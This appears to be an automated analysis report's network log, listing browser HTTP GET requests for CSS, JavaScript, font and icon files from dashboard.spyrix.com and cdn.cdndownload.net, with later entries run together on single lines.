Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    Host: dashboard.spyrix.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/index-93c74fef.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/index-004f4025.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /cdn.js HTTP/1.1
    Host: dashboard.spyrix.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/index-004f4025.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Host: dashboard.spyrix.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/en-08b2a987.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /cdn.js HTTP/1.1
    Host: dashboard.spyrix.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: font
    Referer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/en-5393c481.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Input-34212571.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/index-1178777c.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Host: dashboard.spyrix.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/en-08b2a987.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://dashboard.spyrix.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1
    Host: cdn.cdndownload.net
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://dashboard.spyrix.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
